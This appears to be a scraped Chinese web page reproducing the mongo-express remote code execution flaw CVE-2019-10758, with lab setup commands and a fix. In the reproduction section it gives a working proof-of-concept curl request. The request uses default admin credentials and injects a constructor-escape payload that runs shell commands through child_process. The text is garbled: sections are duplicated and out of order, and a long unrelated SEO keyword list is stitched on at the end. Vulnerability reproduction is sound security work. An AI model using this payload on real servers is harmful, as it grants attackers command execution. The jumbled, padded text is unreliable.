Mongo-express远程代码怎样执行CVE-2019-10758复现
发表于:2025-02-04 作者:千家信息网编辑
千家信息网最后更新 2025年02月04日,Mongo-express远程代码怎样执行CVE-2019-10758复现,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。0x01 简
千家信息网最后更新 2025年02月04日Mongo-express远程代码怎样执行CVE-2019-10758复现0x01 简介 Mongo-express是MongoDB的数据库管理工具,类似Navicat对应Mysql的关系,其使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB图形化管理界面。 0x02 漏洞概述
0x03 影响版本 mongo-express < 0.54.0 使用docker首先搭建MongoDB数据库
再搭建一个存在漏洞版本得express并连接到上面得MongoDB
看到以下信息即可说明搭建成功
访问本机8081端口,可以看到Mongo-express界面
当然也可以直接使用vulhub
查看创建的文件
Mongo-express远程代码怎样执行CVE-2019-10758复现,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。
0x04 环境搭建
docker run --name MyMongo -d mongo:3.2
docker run -it --rm -p 8081:8081 --link MyMongo:mongo mongo-express:0.49
访问本机8081端口,可以看到Mongo-express界面
git clone https://github.com/vulhub/vulhub.gitcd vulhub/mongo-express/CVE-2019-10758docker-compose up -d
0x05 漏洞复现
使用网上Poccurl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("echo Str1am > file.txt")'看到返回Valid且MongoDB界面返回200即为成功
0x06 修复方式
升级至0.54.0以上版本
关于Mongo-express远程代码怎样执行CVE-2019-10758复现问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。
漏洞
问题
代码
版本
界面
成功
数据
数据库
更多
帮助
管理
解答
易行
简单易行
信息
内容
函数
图形
小伙
小伙伴
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
广州市有马互联网科技
数据库无法监听
访问dbase数据库
金联创网络技术
用什么软件开发盲人
我的世界服务器雪块
数据库按指定字符串截取
everything怎么搜索服务器的文件
计算机网络技术的春考录取学校
万德数据库债券行情序列
c实现ftp服务器
兴文县网络安全检察大队
nba球星隐藏数据库
网络技术运用考试
通讯与网络技术
服务器一直黑屏一会自动关
网络安全实验有哪些问题
拼多多群空软件开发
U盘数据库备份文件怎么打开
广州花都网络安全
徽两优985国家数据库
新罗区其群静网络技术工作室
兰州格罗网络技术
服务器坏了怎么判断
会计人员信息数据库
saas一般用啥数据库
miya服务器ip
网络安全和信息科技
c语言txt数据库提取
软件开发者需要具备几种语言
